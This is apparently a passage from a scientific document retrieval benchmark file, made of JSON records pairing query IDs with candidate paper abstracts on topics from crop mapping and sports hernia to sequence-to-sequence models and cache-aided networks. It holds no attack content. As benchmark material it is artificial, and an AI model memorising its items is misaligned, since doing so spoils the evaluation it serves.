bidding environment. Furthermore, the scalability problem from the large real-world auction volume and campaign budget is well handled by state value approximation using neural networks. The empirical study on two large-scale real-world datasets and the live A/B testing on a commercial platform have demonstrated the superior performance and high efficiency compared to state-of-the-art methods.",
"title": ""
},
{
"docid": "214d1911eb4c439402d3b5a81eebf647",
"text": "Crop type mapping and studying the dynamics of agricultural fields in arid and semi-arid environments are of high importance since these ecosystems have witnessed an unprecedented rate of area decline during the last decades. Crop type mapping using medium spatial resolution imagery data has been considered as one of the most important management tools. Remotely sensed data provide reliable, cost and time effective information for monitoring, analyzing and mapping of agricultural land areas. This research was conducted to explore the utility of Landsat 8 imagery data for crop type mapping in a highly fragmented and heterogeneous agricultural landscape in Najaf-Abad Hydrological Unit, Iran. Based on the phenological information from long-term field surveys, five Landsat 8 image scenes (from March to October) were processed to classify the main crop types. In this regard, wheat, barley, alfalfa, and fruit trees have been classified applying inventive decision tree algorithms and Support Vector Machine was used to categorize rice, potato, vegetables, and greenhouse vegetable crops. Accuracy assessment was then undertaken based on spring and summer crop maps (two confusion matrices) that resulted in Kappa coefficients of 0.89. The employed images and classification methods could form a basis for better crop type mapping in central Iran that is undergoing severe drought condition. 2016 Elsevier B.V. All rights reserved.",
"title": ""
},
{
"docid": "6377b90960aaaf2e815339a3315d72cd",
"text": "Coronary artery disease (CAD) is one of the most common causes of death worldwide. In the last decade, significant advancements in CAD treatment have been made. The existing treatment is medical, surgical or a combination of both depending on the extent, severity and clinical presentation of CAD. The collaboration between different science disciplines such as biotechnology and tissue engineering has led to the development of novel therapeutic strategies such as stem cells, nanotechnology, robotic surgery and other advancements (3-D printing and drugs). These treatment modalities show promising effects in managing CAD and associated conditions. Research on stem cells focuses on studying the potential for cardiac regeneration, while nanotechnology research investigates nano-drug delivery and percutaneous coronary interventions including stent modifications and coatings. This article aims to provide an update on the literature (in vitro, translational, animal and clinical) related to these novel strategies and to elucidate the rationale behind their potential treatment of CAD. Through the extensive and continued efforts of researchers and clinicians worldwide, these novel strategies hold the promise to be effective alternatives to existing treatment modalities.",
"title": ""
},
{
"docid": "b5515ce58a5f40fb5129560c9bdc3b10",
"text": "Lipoid pneumonia in children follows mineral oil aspiration and may result in acute respiratory failure. Majority of the patients recover without long-term morbidity, though a few may be left with residual damage to the lungs. We report a case of a two-and-a-half-year-old child with persistent lipoid pneumonia following accidental inhalation of machine oil, who was successfully treated with steroids.",
"title": ""
},
{
"docid": "41f12dbb82a44862ff50b3ba1ca8dd8c",
"text": "We present Neural Image Compression (NIC), a method to reduce the size of gigapixel images by mapping them to a compact latent space using neural networks. We show that this compression allows us to train convolutional neural networks on histopathology whole-slide images end-to-end using weak image-level labels.",
"title": ""
},
{
"docid": "f9c8209fcecbbed99aa29761dffc8e25",
"text": "ImageNet is a large-scale database of object classes with millions of images. Unfortunately only a small fraction of them is manually annotated with bounding-boxes. This prevents useful developments, such as learning reliable object detectors for thousands of classes. In this paper we propose to automatically populate ImageNet with many more bounding-boxes, by leveraging existing manual annotations. The key idea is to localize objects of a target class for which annotations are not available, by transferring knowledge from related source classes with available annotations. We distinguish two kinds of source classes: ancestors and siblings. Each source provides knowledge about the plausible location, appearance and context of the target objects, which induces a probability distribution over windows in images of the target class. We learn to combine these distributions so as to maximize the location accuracy of the most probable window. Finally, we employ the combined distribution in a procedure to jointly localize objects in all images of the target class. Through experiments on 0.5 million images from 219 classes we show that our technique (i) annotates a wide range of classes with bounding-boxes; (ii) effectively exploits the hierarchical structure of ImageNet, since all sources and types of knowledge we propose contribute to the results; (iii) scales efficiently.",
"title": ""
},
{
"docid": "23567568ccfb1f97f5fb5b35460fe063",
"text": "Sportsman (sports) hernia is a medially located bulge in the posterior wall of the inguinal canal that is common in football players. About 90% of cases occur in males. The injury is also found in the general population. The presenting symptom is chronic groin pain which develops during exercise, aggravated by sudden movements, accompanied by subtle physical examination findings and a medial inguinal bulge on ultrasound. Pain persists after a game, abates during a period of lay-off, but returns on the resumption of sport. Frequently, sports hernia is one component of a more extensive pattern of injury known as ‘groin disruption injury’ consisting of osteitis pubis, conjoint tendinopathy, adductor tendinopathy and obturator nerve entrapment. Certain risk factors have been identified, including reduced hip range of motion and poor muscle balance around the pelvis, limb length discrepancy and pelvic instability. The suggested aetiology of the injury is repetitive athletic loading of the symphysis pubis disc, leading to accelerated disc degeneration with consequent pelvic instability and vulnerability to micro-fracturing along the pubic osteochondral junction, periosteal stripping of the pubic ligaments and para-symphyseal tendon tears, causing tendon dysfunction. Diagnostic imaging includes an erect pelvic radiograph (X-ray) with flamingo stress views of the symphysis pubis, real-time ultrasound and, occasionally, computed tomography (CT) scanning and magnetic resonance imaging (MRI), but seldom contrast herniography. Other imaging tests occasionally performed can include nuclear bone scan, limb leg measurement and test injections of local anaesthetic/corticosteroid. The injury may be prevented by the detection and monitoring of players at risk and by correcting significant limb length inequality. Groin reconstruction operation consists of a Maloney darn hernia repair technique, repair of the conjoint tendon, transverse adductor tenotomy and obturator nerve release. Rehabilitation involves core stabilisation exercises and the maintenance of muscle control and strength around the pelvis. Using this regimen of groin reconstruction and post-operative rehabilitation, a player would be anticipated to return to their pre-injury level of activity approximately 3 months after surgery.",
"title": ""
},
{
"docid": "ad0ea5bd92d87bd055ec4321aa502987",
"text": "Context: Although metamodelling is generally accepted as important for our understanding of software and systems development, arguments about the validity and utility of ontological versus linguistic meta-",
"title": ""
},
{
"docid": "4b525d7c8cde7ad4f3f767d2534da63a",
"text": "As various consumers tend to use personalized Cloud services, Service Level Agreements (SLAs) emerge as a key aspect in Cloud and Utility computing. The objectives of this doctoral research are 1) to support a flexible establishment of SLAs that enhances the utility of SLAs for both providers and consumers, and 2) to manage Cloud resources to prevent SLA violations. Because consumers and providers may be independent bodies, some mechanisms are necessary to resolve different preferences when they establish a SLA. Thus, we designed a Cloud SLA negotiation mechanism for interactive and flexible SLA establishment. The novelty of this SLA negotiation mechanism is that it can support advanced multi-issue negotiation that includes time slot and price negotiations. In addition, to prevent SLA violations, we provided a SLA-driven resource allocation scheme that selects a proper data center among globally distributed centers operated by a provider. Empirical results showed that the proposed SLA negotiation mechanism supports faster agreements and achieves higher utilities. Also, the proposed SLA-driven resource allocation scheme performs better in terms of SLA violations and the provider's profits.",
"title": ""
},
{
"docid": "101309b306fa0b46100fc8c88ef05383",
"text": "The study area is located ~50 km in the north of Tehran capital city, Iran, and is a part of central Alborz Mountain. The intrusive bodies aged post Eocene have intruded in the Eocene volcanic units causing hydrothermal alterations in these units. Advanced Spaceborne Thermal Emission and Reflection Radiometer (ASTER) images were used to map hydrothermal alteration zones. The propylitic, phyllic and argillic alteration and iron oxide minerals identified using Spectral Angle Mapper (SAM) method. Structural lineaments were extracted from ASTER images by applying automatic lineament extraction processes and visual interpretations. An exploration model was considered based on previous studies, and appropriate evidence maps were generated, weighted and reclassified. Ore Forming Potential (OFP) map was generated by applying Fuzzy SUM operator on alteration and Pb, Cu, Ag, and Au geochemical anomaly maps. Finally, Host rock, geological structures and OFP were combined using Fuzzy Gamma operator (γ ) to produce mineral prospectivity map. Eventually, the conceptual model discussed here, fairly demonstrated the known hydrothermal gold deposits in the study area and could be a source for future detailed explorations.",
"title": ""
},
{
"docid": "36911701bcf6029eb796bac182e5aa4c",
"text": "In this paper, we describe the approaches taken in the 4WARD project to address the challenges of the network of the future. Our main hypothesis is that the Future Internet must allow for the fast creation of diverse network designs and paradigms, and must also support their co-existence at run-time. We observe that a pure evolutionary path from the current Internet design will not be able to address, in a satisfactory manner, major issues like the handling of mobile users, information access and delivery, wide area sensor network applications, high management complexity, and malicious traffic that hamper network performance already today. Moreover, the Internetpsilas focus on interconnecting hosts and delivering bits has to be replaced by a more holistic vision of a network of information and content. This is a natural evolution of scope requiring nonetheless a re-design of the architecture. We describe how 4WARD directs research on network virtualisation, novel InNetworkManagement, a generic path concept, and an information centric approach, into a single framework for a diversified, but interoperable, network of the future.",
"title": ""
},
{
"docid": "4a2303d673b146dc9c2849d743aaaaa2",
"text": "With the recent advances in information networks, the problem of community detection has attracted much attention in the last decade. While network community detection has been ubiquitous, the task of collecting complete network data remains challenging in many real-world applications. Usually the collected network is incomplete with most of the edges missing. Commonly, in such networks, all nodes with attributes are available while only the edges within a few local regions of the network can be observed. In this paper, we study the problem of detecting communities in incomplete information networks with missing edges. We first learn a distance metric to reproduce the link-based distance between nodes from the observed edges in the local information regions. We then use the learned distance metric to estimate the distance between any pair of nodes in the network. A hierarchical clustering approach is proposed to detect communities within the incomplete information networks. Empirical studies on real-world information networks demonstrate that our proposed method can effectively detect community structures within incomplete information networks.",
"title": ""
},
{
"docid": "f74cfc71a268b2155fe6920b00bc62d4",
"text": "The vaginal microbiome in healthy women changes over short periods of time, differs among individuals, and varies in its response to sexual intercourse.",
"title": ""
}
] | scidocsrr |
e6b482f0bd7b3238a6346266c21b4b44 | Context-aware Natural Language Generation for Spoken Dialogue Systems | [
{
"docid": "33468c214408d645651871bd8018ed82",
"text": "In this paper, we carry out two experiments on the TIMIT speech corpus with bidirectional and unidirectional Long Short Term Memory (LSTM) networks. In the first experiment (framewise phoneme classification) we find that bidirectional LSTM outperforms both unidirectional LSTM and conventional Recurrent Neural Networks (RNNs). In the second (phoneme recognition) we find that a hybrid BLSTM-HMM system improves on an equivalent traditional HMM system, as well as unidirectional LSTM-HMM.",
"title": ""
},
{
"docid": "6af09f57f2fcced0117dca9051917a0d",
"text": "We present a novel per-dimension learning rate method for gradient descent called ADADELTA. The method dynamically adapts over time using only first order information and has minimal computational overhead beyond vanilla stochastic gradient descent. The method requires no manual tuning of a learning rate and appears robust to noisy gradient information, different model architecture choices, various data modalities and selection of hyperparameters. We show promising results compared to other methods on the MNIST digit classification task using a single machine and on a large scale voice dataset in a distributed cluster environment.",
"title": ""
}
] | [
{
"docid": "acbdb3f3abf3e56807a4e7f60869a2ee",
"text": "In this paper we present a new approach to high quality 3D object reconstruction. Starting from a calibrated sequence of color images, the algorithm is able to reconstruct both the 3D geometry and the texture. The core of the method is based on a deformable model, which defines the framework where texture and silhouette information can be fused. This is achieved by defining two external forces based on the images: a texture driven force and a silhouette driven force. The texture force is computed in two steps: a multi-stereo correlation voting approach and a gradient vector flow diffusion. Due to the high resolution of the voting approach, a multi-grid version of the gradient vector flow has been developed. Concerning the silhouette force, a new formulation of the silhouette constraint is derived. It provides a robust way to integrate the silhouettes in the evolution algorithm. As a consequence, we are able to recover the apparent contours of the model at the end of the iteration process. Finally, a texture map is computed from the original images for the reconstructed 3D model.",
"title": ""
},
{
"docid": "b230400ee47b40751623561e11b1944c",
"text": "Many mHealth apps have been developed to assist people in self-care management. Most of them aim to engage users and provide motivation to increase adherence. Gamification has been introduced to identify the left and right brain drives in order to engage users and motivate them. We are using Octalysis framework to map how top rated stress management apps address the right brain drives. 12 stress management mHealth are classified based on this framework. In this paper, we explore how Gamification has been used in mHealth apps, the intrinsic motivation using self-determination theory, methodology, and findings. In the discussion, we identify design principles that will better suited to enhance intrinsic motivation for people who seek self-stress management.",
"title": ""
},
{
"docid": "9d210dc8bc48e4ff9bf72c260f169ada",
"text": "We introduce a formal model of teaching in which the teacher is tailored to a particular learner, yet the teaching protocol is designed so that no collusion is possible. Not surprisingly, such a model remedies the non-intuitive aspects of other models in which the teacher must successfully teach any consistent learner. We prove that any class that can be exactly identiied by a determin-istic polynomial-time algorithm with access to a very rich set of example-based queries is teachable by a computationally unbounded teacher and a polynomial-time learner. In addition, we present other general results relating this model of teaching to various previous results. We also consider the problem of designing teacher/learner pairs in which both the teacher and learner are polynomial-time algorithms and describe teacher/learner pairs for the classes of 1-decision lists and Horn sentences.",
"title": ""
},
{
"docid": "25d45edce51fcaddc991ae2e6154b743",
"text": "In this paper, we present an intuitive and controllable patch-based technique for terrain synthesis. Our method is based on classical patch-based texture synthesis approaches. It generates a new terrain model by combining patches extracted from a given set of exemplars, providing a control performed by a low frequency guide, a categorization of exemplars, and a map for distributing these categories. Furthermore, we propose criteria to validate the input, some structures to accelerate the patch choice, and a metric based on the process, these structures, and some specificities of the data.",
"title": ""
},
{
"docid": "586ea16456356b6301e18f39e50baa89",
"text": "In this paper we address the problem of migrating a legacy Web application to a cloud service. We develop a reusable architectural pattern to do so and validate it with a case study of the Beta release of the IBM Bluemix Workflow Service [1] (herein referred to as the Beta Workflow service). It uses Docker [2] containers and a Cloudant [3] persistence layer to deliver a multi-tenant cloud service by re-using a legacy codebase. We are not aware of any literature that addresses this problem by using containers.The Beta Workflow service provides a scalable, stateful, highly available engine to compose services with REST APIs. The composition is modeled as a graph but authored in a Javascript-based domain specific language that specifies a set of activities and control flow links among these activities. The primitive activities in the language can be used to respond to HTTP REST requests, invoke services with REST APIs, and execute Javascript code to, among other uses, extract and construct the data inputs and outputs to external services, and make calls to these services.Examples of workflows that have been built using the service include distributing surveys and coupons to customers of a retail store [1], the management of sales requests between a salesperson and their regional managers, managing the staged deployment of different versions of an application, and the coordinated transfer of jobs among case workers.",
"title": ""
},
{
"docid": "1f56fb6b6f21eb95a903190a826da6f6",
"text": "Frustration is used as a criterion for identifying usability problems (UPs) and for rating their severity in a few of the existing severity scales, but it is not operationalized. No research has systematically examined how frustration varies with the severity of UPs. We aimed to address these issues with a hybrid approach, using Self-Assessment Manikin, comments elicited with Cued-Recall Debrief, galvanic skin responses (GSR) and gaze data. Two empirical studies involving a search task with a website known to have UPs were conducted to substantiate findings and improve on the methodological framework, which could facilitate usability evaluation practice. Results showed no correlation between GSR peaks and severity ratings, but GSR peaks were correlated with frustration scores -- a metric we developed. The Peak-End rule was partially verified. The problematic evaluator effect was the limitation as it confounded the severity ratings of UPs. Future work is aimed to control this effect and to develop a multifaceted severity scale.",
"title": ""
},
{
"docid": "c3e63d82514b9e9b1cc172ea34f7a53e",
"text": "Deep Learning is one of the next big things in Recommendation Systems technology. The past few years have seen the tremendous success of deep neural networks in a number of complex machine learning tasks such as computer vision, natural language processing and speech recognition. After its relatively slow uptake by the recommender systems community, deep learning for recommender systems became widely popular in 2016.\n We believe that a tutorial on the topic of deep learning will do its share to further popularize the topic. Notable recent application areas are music recommendation, news recommendation, and session-based recommendation. The aim of the tutorial is to encourage the application of Deep Learning techniques in Recommender Systems, to further promote research in deep learning methods for Recommender Systems.",
"title": ""
},
{
"docid": "da3634b5a14829b22546389e56425017",
"text": "Homomorphic encryption (HE)—the ability to perform computations on encrypted data—is an attractive remedy to increasing concerns about data privacy in the field of machine learning. However, building models that operate on ciphertext is currently labor-intensive and requires simultaneous expertise in deep learning, cryptography, and software engineering. Deep learning frameworks, together with recent advances in graph compilers, have greatly accelerated the training and deployment of deep learning models to a variety of computing platforms. Here, we introduce nGraph-HE, an extension of the nGraph deep learning compiler, which allows data scientists to deploy trained models with popular frameworks like TensorFlow, MXNet and PyTorch directly, while simply treating HE as another hardware target. This combination of frameworks and graph compilers greatly simplifies the development of privacy-preserving machine learning systems, provides a clean abstraction barrier between deep learning and HE, allows HE libraries to exploit HE-specific graph optimizations, and comes at a low cost in runtime overhead versus native HE operations.",
"title": ""
},
{
"docid": "c89de16110a66d65f8ae7e3476fe90ef",
"text": "In this paper, a new notion which we call private data deduplication protocol, a deduplication technique for private data storage is introduced and formalized. Intuitively, a private data deduplication protocol allows a client who holds a private data proves to a server who holds a summary string of the data that he/she is the owner of that data without revealing further information to the server. Our notion can be viewed as a complement of the state-of-the-art public data deduplication protocols of Halevi et al [7]. The security of private data deduplication protocols is formalized in the simulation-based framework in the context of two-party computations. A construction of private deduplication protocols based on the standard cryptographic assumptions is then presented and analyzed. We show that the proposed private data deduplication protocol is provably secure assuming that the underlying hash function is collision-resilient, the discrete logarithm is hard and the erasure coding algorithm can erasure up to α-fraction of the bits in the presence of malicious adversaries in the presence of malicious adversaries. To the best our knowledge this is the first deduplication protocol for private data storage.",
"title": ""
},
{
"docid": "57accb84a15f3b3767ef9a4a524e29b8",
"text": "Drosophila melanogaster activates a variety of immune responses against microbial infections. However, information on the Drosophila immune response to entomopathogenic nematode infections is currently limited. The nematode Heterorhabditis bacteriophora is an insect parasite that forms a mutualistic relationship with the gram-negative bacteria Photorhabdus luminescens. Following infection, the nematodes release the bacteria that quickly multiply within the insect and produce several toxins that eventually kill the host. Although we currently know that the insect immune system interacts with Photorhabdus, information on interaction with the nematode vector is scarce. Here we have used next generation RNA-sequencing to analyze the transcriptional profile of wild-type adult flies infected by axenic Heterorhabditis nematodes (lacking Photorhabdus bacteria), symbiotic Heterorhabditis nematodes (carrying Photorhabdus bacteria), and Photorhabdus bacteria alone. We have obtained approximately 54 million reads from the different infection treatments. Bioinformatic analysis shows that infection with Photorhabdus alters the transcription of a large number of Drosophila genes involved in translational repression as well in response to stress. However, Heterorhabditis infection alters the transcription of several genes that participate in lipidhomeostasis and metabolism, stress responses, DNA/protein sythesis and neuronal functions. We have also identified genes in the fly with potential roles in nematode recognition, anti-nematode activity and nociception. These findings provide fundamental information on the molecular events that take place in Drosophila upon infection with the two pathogens, either separately or together. Such large-scale transcriptomic analyses set the stage for future functional studies aimed at identifying the exact role of key factors in the Drosophila immune response against nematode-bacteria complexes.",
"title": ""
},
{
"docid": "6a80eb8001380f4d63a8cf3f3693f73c",
"text": "Traditional energy measurement fails to provide support to consumers to make intelligent decisions to save energy. Non-intrusive load monitoring is one solution that provides disaggregated power consumption profiles. Machine learning approaches rely on public datasets to train parameters for their algorithms, most of which only provide low-frequency appliance-level measurements, thus limiting the available feature space for recognition.\n In this paper, we propose a low-cost measurement system for high-frequency energy data. Our work utilizes an off-the-shelf power strip with a voltage-sensing circuit, current sensors, and a single-board PC as data aggregator. We develop a new architecture and evaluate the system in real-world environments. The self-contained unit for six monitored outlets can achieve up to 50 kHz for all signals simultaneously. A simple design and off-the-shelf components allow us to keep costs low. Equipping a building with our measurement systems is more feasible compared to expensive existing solutions. We used the outlined system architecture to manufacture 20 measurement systems to collect energy data over several months of more than 50 appliances at different locations, with an aggregated size of 15 TB.",
"title": ""
},
{
"docid": "e66f94aeea80b7efb6a35abd9a764aea",
"text": "A non-linear poroelastic finite element model of the lumbar spine was developed to investigate spinal response during daily dynamic physiological activities. Swelling was simulated by imposing a boundary pore pressure of 0.25 MPa at all external surfaces. Partial saturation of the disc was introduced to circumvent the negative pressures otherwise computed upon unloading. The loading conditions represented a pre-conditioning full day followed by another day of loading: 8h rest under a constant compressive load of 350 N, followed by 16 h loading phase under constant or cyclic compressive load varying in between 1000 and 1600 N. In addition, the effect of one or two short resting periods in the latter loading phase was studied. The model yielded fairly good agreement with in-vivo and in-vitro measurements. Taking the partial saturation of the disc into account, no negative pore pressures were generated during unloading and recovery phase. Recovery phase was faster than the loading period with equilibrium reached in only approximately 3h. With time and during the day, the axial displacement, fluid loss, axial stress and disc radial strain increased whereas the pore pressure and disc collagen fiber strains decreased. The fluid pressurization and collagen fiber stiffening were noticeable early in the morning, which gave way to greater compression stresses and radial strains in the annulus bulk as time went by. The rest periods dampened foregoing differences between the early morning and late in the afternoon periods. The forgoing diurnal variations have profound effects on lumbar spine biomechanics and risk of injury.",
"title": ""
},
{
"docid": "9a38b18bd69d17604b6e05b9da450c2d",
"text": "New invention of advanced technology, enhanced capacity of storage media, maturity of information technology and popularity of social media, business intelligence and Scientific invention, produces huge amount of data which made ample set of information that is responsible for birth of new concept well known as big data. Big data analytics is the process of examining large amounts of data. The analysis is done on huge amount of data which is structure, semi structure and unstructured. In big data, data is generated at exponentially for reason of increase use of social media, email, document and sensor data. The growth of data has affected all fields, whether it is business sector or the world of science. In this paper, the process of system is reviewed for managing "Big Data" and today's activities on big data tools and techniques.",
"title": ""
},
{
"docid": "346349308d49ac2d3bb1cfa5cc1b429c",
"text": "The prevalent approach to sequence to sequence learning maps an input sequence to a variable length output sequence via recurrent neural networks. We introduce an architecture based entirely on convolutional neural networks.1 Compared to recurrent models, computations over all elements can be fully parallelized during training and optimization is easier since the number of non-linearities is fixed and independent of the input length. Our use of gated linear units eases gradient propagation and we equip each decoder layer with a separate attention module. We outperform the accuracy of the deep LSTM setup of Wu et al. (2016) on both WMT’14 EnglishGerman and WMT’14 English-French translation at an order of magnitude faster speed, both on GPU and CPU.",
"title": ""
},
{
"docid": "405022c5a2ca49973eaaeb1e1ca33c0f",
"text": "BACKGROUND\nPreanalytical factors are the main source of variation in clinical chemistry testing and among the major determinants of preanalytical variability, sample hemolysis can exert a strong influence on result reliability. Hemolytic samples are a rather common and unfavorable occurrence in laboratory practice, as they are often considered unsuitable for routine testing due to biological and analytical interference. However, definitive indications on the analytical and clinical management of hemolyzed specimens are currently lacking. Therefore, the present investigation evaluated the influence of in vitro blood cell lysis on routine clinical chemistry testing.\n\n\nMETHODS\nNine aliquots, prepared by serial dilutions of homologous hemolyzed samples collected from 12 different subjects and containing a final concentration of serum hemoglobin ranging from 0 to 20.6 g/L, were tested for the most common clinical chemistry analytes. Lysis was achieved by subjecting whole blood to an overnight freeze-thaw cycle.\n\n\nRESULTS\nHemolysis interference appeared to be approximately linearly dependent on the final concentration of blood-cell lysate in the specimen. This generated a consistent trend towards overestimation of alanine aminotransferase (ALT), aspartate aminotransferase (AST), creatinine, creatine kinase (CK), iron, lactate dehydrogenase (LDH), lipase, magnesium, phosphorus, potassium and urea, whereas mean values of albumin, alkaline phosphatase (ALP), chloride, gamma-glutamyltransferase (GGT), glucose and sodium were substantially decreased. Clinically meaningful variations of AST, chloride, LDH, potassium and sodium were observed in specimens displaying mild or almost undetectable hemolysis by visual inspection (serum hemoglobin < 0.6 g/L). The rather heterogeneous and unpredictable response to hemolysis observed for several parameters prevented the adoption of reliable statistic corrective measures for results on the basis of the degree of hemolysis.\n\n\nCONCLUSION\nIf hemolysis and blood cell lysis result from an in vitro cause, we suggest that the most convenient corrective solution might be quantification of free hemoglobin, alerting the clinicians and sample recollection.",
"title": ""
},
{
"docid": "1d9b50bf7fa39c11cca4e864bbec5cf3",
"text": "FPGA-based embedded soft vector processors can exceed the performance and energy-efficiency of embedded GPUs and DSPs for lightweight deep learning applications. For low complexity deep neural networks targeting resource constrained platforms, we develop optimized Caffe-compatible deep learning library routines that target a range of embedded accelerator-based systems between 4 -- 8 W power budgets such as the Xilinx Zedboard (with MXP soft vector processor), NVIDIA Jetson TK1 (GPU), InForce 6410 (DSP), TI EVM5432 (DSP) as well as the Adapteva Parallella board (custom multi-core with NoC). For MNIST (28×28 images) and CIFAR10 (32×32 images), the deep layer structure is amenable to MXP-enhanced FPGA mappings to deliver 1.4 -- 5× higher energy efficiency than all other platforms. Not surprisingly, embedded GPU works better for complex networks with large image resolutions.",
"title": ""
},
{
"docid": "4413ef4f192d5061da7bf2baa82c9048",
"text": "We developed and piloted a program for first-grade students to promote development of legible handwriting and writing fluency. The Write Start program uses a coteaching model in which occupational therapists and teachers collaborate to develop and implement a handwriting-writing program. The small-group format with embedded individualized supports allows the therapist to guide and monitor student performance and provide immediate feedback. The 12-wk program was implemented with 1 class of 19 students. We administered the Evaluation of Children's Handwriting Test, Minnesota Handwriting Assessment, and Woodcock-Johnson Fluency and Writing Samples test at baseline, immediately after the Write Start program, and at the end of the school year. Students made large, significant gains in handwriting legibility and speed and in writing fluency that were maintained at 6-mo follow-up. The Write Start program appears to promote handwriting and writing skills in first-grade students and is ready for further study in controlled trials.",
"title": ""
},
{
"docid": "3b145aa14e1052467f78b911cda4109b",
"text": "Dual Connectivity(DC) is one of the key technologies standardized in Release 12 of the 3GPP specifications for the Long Term Evolution (LTE) network. It attempts to increase the per-user throughput by allowing the user equipment (UE) to maintain connections with the MeNB (master eNB) and SeNB (secondary eNB) simultaneously, which are inter-connected via non-ideal backhaul. In this paper, we focus on one of the use cases of DC whereby the downlink U-plane data is split at the MeNB and transmitted to the UE via the associated MeNB and SeNB concurrently. In this case, out-of-order packet delivery problem may occur at the UE due to the delay over the non-ideal backhaul link, as well as the dynamics of channel conditions over the MeNB-UE and SeNB-UE links, which will introduce extra delay for re-ordering the packets. As a solution, we propose to adopt the RaptorQ FEC code to encode the source data at the MeNB, and then the encoded symbols are separately transmitted through the MeNB and SeNB. The out-of-order problem can be effectively eliminated since the UE can decode the original data as long as it receives enough encoded symbols from either the MeNB or SeNB. We present detailed protocol design for the RaptorQ code based concurrent transmission scheme, and simulation results are provided to illustrate the performance of the proposed scheme.",
"title": ""
},
{
"docid": "c89347bd4819678592699b1cc982436f",
"text": "Online tracking is evolving from browserand devicetracking to people-tracking. As users are increasingly accessing the Internet from multiple devices this new paradigm of tracking—in most cases for purposes of advertising—is aimed at crossing the boundary between a user’s individual devices and browsers. It establishes a person-centric view of a user across devices and seeks to combine the input from various data sources into an individual and comprehensive user profile. By its very nature such cross-device tracking can principally reveal a complete picture of a person and, thus, become more privacy-invasive than the siloed tracking via HTTP cookies or other traditional and more limited tracking mechanisms. In this study we are exploring cross-device tracking techniques as well as their privacy implications. Particularly, we demonstrate a method to detect the occurrence of cross-device tracking, and, based on a cross-device tracking dataset that we collected from 126 Internet users, we explore the prevalence of cross-device trackers on mobile and desktop devices. We show that the similarity of IP addresses and Internet history for a user’s devices gives rise to a matching rate of F-1 = 0.91 for connecting a mobile to a desktop device in our dataset. This finding is especially noteworthy in light of the increase in learning power that cross-device companies may achieve by leveraging user data from more than one device. Given these privacy implications of cross-device tracking we also examine compliance with applicable self-regulation for 40 cross-device companies and find that some are not transparent about their practices.",
"title": ""
},
{
"docid": "d3afbb88f0575bd18365c85c6faea868",
"text": "The present paper examines the causal linkage between foreign direct investment (FDI), financial development, and economic growth in a panel of 4 countries of North Africa (Tunisia, Morocco, Algeria and Egypt) over the period 1980-2011. The study moves away from the traditional cross-sectional analysis, and focuses on more direct evidence of the channels through which FDI inflows can promote economic growth of the host country. Using Generalized Method of Moment (GMM) panel data analysis, we find strong evidence of a positive relationship between FDI and economic growth. We also find evidence that the development of the domestic financial system is an important prerequisite for FDI to have a positive effect on economic growth. The policy implications of this study appeared clear. Improvement efforts need to be driven by local-level reforms to ensure the development of domestic financial system in order to maximize the benefits of the presence of FDI.",
"title": ""
}
] | scidocsrr |
f052a71984bc134746a0c54fc720513f | Aircraft Type Recognition in Remote Sensing Images Based on Feature Learning with Conditional Generative Adversarial Networks | [
{
"docid": "f1deb9134639fb8407d27a350be5b154",
"text": "This work introduces a novel Convolutional Network architecture for the task of human pose estimation. Features are processed across all scales and consolidated to best capture the various spatial relationships associated with the body. We show how repeated bottom-up, top-down processing used in conjunction with intermediate supervision is critical to improving the performance of the network. We refer to the architecture as a ‘stacked hourglass’ network based on the successive steps of pooling and upsampling that are done to produce a final set of estimates. State-of-the-art results are achieved on the FLIC and MPII benchmarks outcompeting all recent methods.",
"title": ""
}
] | [
{
"docid": "d90add899632bab1c5c2637c7080f717",
"text": "Software Testing plays a important role in Software development because it can minimize the development cost. We Propose a Technique for Test Sequence Generation using UML Model Sequence Diagram.UML models give a lot of information that should not be ignored in testing. In This paper main features extract from Sequence Diagram after that we can write the Java Source code for that Features According to ModelJunit Library. ModelJUnit is a extended library of JUnit Library. By using that Source code we can Generate Test Case Automatic and Test Coverage. This paper describes a systematic Test Case Generation Technique performed on model based testing (MBT) approaches By Using Sequence Diagram.",
"title": ""
},
{
"docid": "cd0c1507c1187e686c7641388413d3b5",
"text": "Inference of three-dimensional motion from the fusion of inertial and visual sensory data has to contend with the preponderance of outliers in the latter. Robust filtering deals with the joint inference and classification task of selecting which data fits the model, and estimating its state. We derive the optimal discriminant and propose several approximations, some used in the literature, others new. We compare them analytically, by pointing to the assumptions underlying their approximations, and empirically. We show that the best performing method improves the performance of state-of-the-art visual-inertial sensor fusion systems, while retaining the same computational complexity.",
"title": ""
},
{
"docid": "736a413352df6b0225b4d567a26a5d78",
"text": "This letter presents a compact, single-feed, dual-band antenna covering both the 433-MHz and 2.45-GHz Industrial Scientific and Medical (ISM) bands. The antenna has small dimensions of 51 ×28 mm2. A square-spiral resonant element is printed on the top layer for the 433-MHz band. The remaining space within the spiral is used to introduce an additional parasitic monopole element on the bottom layer that is resonant at 2.45 GHz. Measured results show that the antenna has a 10-dB return-loss bandwidth of 2 MHz at 433 MHz and 132 MHz at 2.45 GHz, respectively. The antenna has omnidirectional radiation characteristics with a peak realized gain (measured) of -11.5 dBi at 433 MHz and +0.5 dBi at 2.45 GHz, respectively.",
"title": ""
},
{
"docid": "4f511a669a510153aa233d90da4e406a",
"text": "In many visual surveillance applications the task of person detection and localization can be solved easier by using thermal long-wave infrared (LWIR) cameras which are less affected by changing illumination or background texture than visual-optical cameras. Especially in outdoor scenes where usually only few hot spots appear in thermal infrared imagery, humans can be detected more reliably due to their prominent infrared signature. We propose a two-stage person recognition approach for LWIR images: (1) the application of Maximally Stable Extremal Regions (MSER) to detect hot spots instead of background subtraction or sliding window and (2) the verification of the detected hot spots using a Discrete Cosine Transform (DCT) based descriptor and a modified Random Naïve Bayes (RNB) classifier. The main contributions are the novel modified RNB classifier and the generality of our method. We achieve high detection rates for several different LWIR datasets with low resolution videos in real-time. While many papers in this topic are dealing with strong constraints such as considering only one dataset, assuming a stationary camera, or detecting only moving persons, we aim at avoiding such constraints to make our approach applicable with moving platforms such as Unmanned Ground Vehicles (UGV).",
"title": ""
},
{
"docid": "7d3ef8bdc50bd2931d8cb31683b35e90",
"text": "This paper characterizes the performance of a generic $K$-tier cache-aided heterogeneous network (CHN), in which the base stations (BSs) across tiers differ in terms of their spatial densities, transmission powers, pathloss exponents, activity probabilities conditioned on the serving link and placement caching strategies. We consider that each user connects to the BS which maximizes its average received power and at the same time caches its file of interest. Modeling the locations of the BSs across different tiers as independent homogeneous Poisson Point processes (HPPPs), we derive closed-form expressions for the coverage probability and local delay experienced by a typical user in receiving each requested file. We show that our results for coverage probability and delay are consistent with those previously obtained in the literature for a single tier system.",
"title": ""
},
{
